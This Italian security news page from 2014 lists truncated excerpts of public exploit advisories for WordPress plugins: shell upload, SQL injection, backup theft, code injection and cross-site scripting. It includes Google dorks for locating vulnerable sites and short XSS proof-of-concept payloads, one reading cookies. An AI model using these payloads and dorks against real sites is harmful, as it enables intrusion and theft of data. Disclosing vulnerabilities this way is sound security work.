WordPress Html5 Mp3 Player Full Path Disclosure

26 novembre 2014 - Fonte: http://www.mondounix.com
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz :  Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
              DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/...

Leggi il seguito »

WordPress wpDataTables 1.5.3 Shell Upload

26 novembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
# 
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
#    function wdt_upload_file(){
#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
#        $uploadHandler = new UploadHandler();
#        exit();
#    }
#    ...
#    ...
#    ...
#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file'...

Leggi il seguito »

WordPress wpDataTables 1.5.3 SQL Injection

26 novembre 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani 
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
######################
 
# Description
 
Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability
 
"table_id" variable is not sanitized.
 
File: wpdatatables.php
------------------------
    // AJAX-handlers
    add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
    add_action( 'wp_ajax_nopriv_get_wdtable',...

Leggi il seguito »

WordPress WP-DB-Backup 2.2.4 Backup Theft

26 novembre 2014 - Fonte: http://www.mondounix.com
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
 
DATE="20141031"; #Date to search
 
if [ ! -e rainbow ]; then
 
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16]...

Leggi il seguito »

WordPress CM Download Manager 2.0.0 Code Injection

22 novembre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
CVE: CVE-2014-8877 
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and previous version
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Phi Le Ngoc - phi.n.le@itas.vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRITION::
 
The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment....

Leggi il seguito »

WordPress SP Client Document Manager 2.4.1 SQL Injection

22 novembre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRITION::
 
Multiple SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database....

Leggi il seguito »

WordPress 3.9.2 Cross Site Scripting

21 novembre 2014 - Fonte: http://www.mondounix.com
 
OVERVIEW
========
 
A security flaw in WordPress 3 allows injection of JavaScript into certain text fields. In particular, the problem affects comment boxes on WordPress posts and pages. These don't require authentication by default.
 
The JavaScript injected into a comment is executed when the target user views it, either on a blog post, a page, or in the Comments section of the administrative Dashboard.
 
In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue. The exploit is not then visible to normal users, search engines, etc.
 
When a blog administrator goes to the Dashboard/Comments section to review new comments,...

Leggi il seguito »

WordPress SupportEzzy Ticket System 1.2.5 Cross Site Scripting

14 novembre 2014 - Fonte: http://www.mondounix.com
# Exploit Title: SupportEzzy Ticket System - WordPress Plugin Stored XSS Vulnerability
# Date: 12-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v1.2.5
# Vendor Homepage: http://codecanyon.net/item/supportezzy-ticket-system-wordpress-plugin/8908617
# Software Test Link: http://demo.cssjockey.com/cjsupport/supportezzy/
# Tested on: Iceweasel and Chrome
 
# Vulnerabilities Description:
 
===Stored XSS===
Register and login to system and then submit new ticket. "URL (optional)"
input is not secure. You can run XSS payloads, use sample payload to test.
 
Sample Payload for Stored XSS: http://example.com
"><script>alert(document.cookie);</script>
 
===Solution===
Filter the input...

Leggi il seguito »

WordPress Classifieds Cross Site Scripting – SQL Injection

10 novembre 2014 - Fonte: http://www.mondounix.com
Exploit Title: Another Wordpress Classifieds Plugin sql injection and Cross Site Scripting  
Author: dill 
download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/Client 
Webpage: http://awpcp.com/
 
Issue number 1: Cross-site scripting (reflective) 
 
Details: 
An arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute and then encapsulated in double quotation marks. This is then echoed in the applications response. 
 
Proof-of-Concept (PoC): 
http://vulnerable.server/?page_id=16587&step=send-access-key&a40f8%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E76975=1
 
Issue number 2: SQL injection
Details:
The parameter “keywordphrase” is susceptible to a...

Leggi il seguito »

WordPress Wordfence Firewall 5.1.2 Cross Site Scripting

8 novembre 2014 - Fonte: http://www.mondounix.com
WordPress Wordfence Firewall plugin version 5.1.2 suffers from a cross site scripting vulnerability.
===============================================
 
Product: Wordfence Firewall Plugin For Wordpress 
Vendor: Wordfence
Vulnerable Version(s): 5.1.2
Tested Version: 5.1.2
Advisory Publication:  June 30, 2014  [without technical details]
Vendor Notification: June 24, 2014 
Vendor Patch: June 29, 2014 
Public Disclosure: June 30, 2014 
Vulnerability Type:Reflected Cross-Site Scripting
CVE Reference: CVE-2014-4664
Risk Level: High
Solution Status: Fixed by Vendor
---------------------------------------------------------------
Reported By  - Narendra Bhati ( R00t Sh3ll)
Security Analyst  @ Suma Soft Pvt. Ltd. ( IT Risk & Security...

Leggi il seguito »